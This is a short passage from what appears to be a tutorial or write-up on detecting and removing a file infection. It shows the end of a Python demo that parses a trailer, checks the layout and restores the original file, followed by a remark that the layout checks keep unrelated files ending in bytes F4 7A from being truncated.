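    return head + body[3:], original


if __name__ == "__main__":
    sample, original = build_sample()
    t = parse_trailer(sample)
    print("trailer:", t, "problems:", layout_problems(sample, t))
    print("restored matches original:", disinfect(sample) == original)
```

The marker word alone is only two bytes, so the layout checks are what keep an unrelated file that happens to end in F4 7A from being truncated.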